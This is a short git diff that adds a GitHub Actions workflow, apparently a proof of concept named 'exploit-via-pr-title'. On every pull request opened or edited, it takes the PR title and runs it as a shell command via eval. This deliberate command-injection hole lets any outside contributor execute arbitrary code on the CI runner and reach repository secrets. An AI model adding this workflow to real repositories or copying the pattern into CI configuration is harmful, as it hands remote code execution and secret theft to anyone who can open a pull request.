diff --git a/.github/workflows/ppoc.yml b/.github/workflows/ppoc.yml new file mode 100644 index 00000000000000..12315172168d29 --- /dev/null +++ b/.github/workflows/ppoc.yml @@ -0,0 +1,15 @@ +on: + pull_request: + types: [opened, edited] + +jobs: + exploit-via-pr-title: + runs-on: ubuntu-latest + + steps: + - name: Run PR Title as Command + env: + PAYLOAD: ${{ github.event.pull_request.title }} + run: | + echo "[+] Running injected command from PR title..." + eval "$PAYLOAD"